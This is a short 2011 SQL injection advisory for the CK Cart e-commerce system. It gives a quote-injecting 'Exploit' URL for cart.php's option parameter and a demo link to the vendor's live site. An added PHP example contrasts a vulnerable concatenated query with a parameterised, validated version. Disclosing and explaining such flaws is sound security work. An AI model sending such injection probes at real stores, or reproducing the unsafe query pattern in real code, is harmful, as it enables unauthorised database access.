# Exploit Title: CK Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.ckcart.com/
# Version: All versions
# Tested on: All versions are vulnerable

ISSUE

SQL injection is possible through user-supplied request input.

Vulnerable Page: cart.php

Example: cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24&quantity=1&submit=Order

Exploit: cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order

Demo: http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24&quantity=1&submit=Order

Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
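
Added example, not CK Cart's code and not part of the original advisory: how a quote in an option_<id> value breaks a concatenated query, next to the same lookup with bound parameters and validated keys. The item_options table, its columns and all function names are hypothetical; the request string is the one shown above.

```php
<?php
declare(strict_types=1);
// Hypothetical schema and helpers; the application's real code is not on the page.

function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE item_options (option_id INTEGER, item_id INTEGER, value TEXT)');
    $db->prepare('INSERT INTO item_options VALUES (?, ?, ?)')->execute([111, 173, '$']);
    return $db;
}

// Vulnerable pattern: the option value becomes part of the SQL text.
function option_exists_unsafe(PDO $db, int $itemId, int $optionId, string $value): bool {
    $sql = "SELECT COUNT(*) FROM item_options WHERE item_id = $itemId"
         . " AND option_id = $optionId AND value = '$value'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened: the value is sent as a bound parameter, never as SQL text.
function option_exists_safe(PDO $db, int $itemId, int $optionId, string $value): bool {
    $st = $db->prepare('SELECT COUNT(*) FROM item_options'
                     . ' WHERE item_id = ? AND option_id = ? AND value = ?');
    $st->execute([$itemId, $optionId, $value]);
    return (int) $st->fetchColumn() > 0;
}

// Accept only an integer item_id and keys of the form option_<digits>.
function parse_cart_request(array $get): array {
    $itemId = filter_var($get['item_id'] ?? null, FILTER_VALIDATE_INT);
    if ($itemId === false) {
        throw new InvalidArgumentException('item_id must be an integer');
    }
    $options = [];
    foreach ($get as $key => $val) {
        if (is_string($val) && preg_match('/^option_(\d{1,9})$/', (string) $key, $m)) {
            $options[(int) $m[1]] = $val;
        }
    }
    return [$itemId, $options];
}

$db = demo_db();
parse_str("action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order", $get);
[$itemId, $options] = parse_cart_request($get);
foreach ($options as $optionId => $value) {
    try {
        option_exists_unsafe($db, $itemId, $optionId, $value);
    } catch (PDOException $e) {
        echo "unsafe: the quote in the value changed the SQL and the query failed\n";
    }
    // Bound parameter: the value is compared as data, so no such option is found.
    echo 'safe: ', var_export(option_exists_safe($db, $itemId, $optionId, $value), true), "\n";
}
```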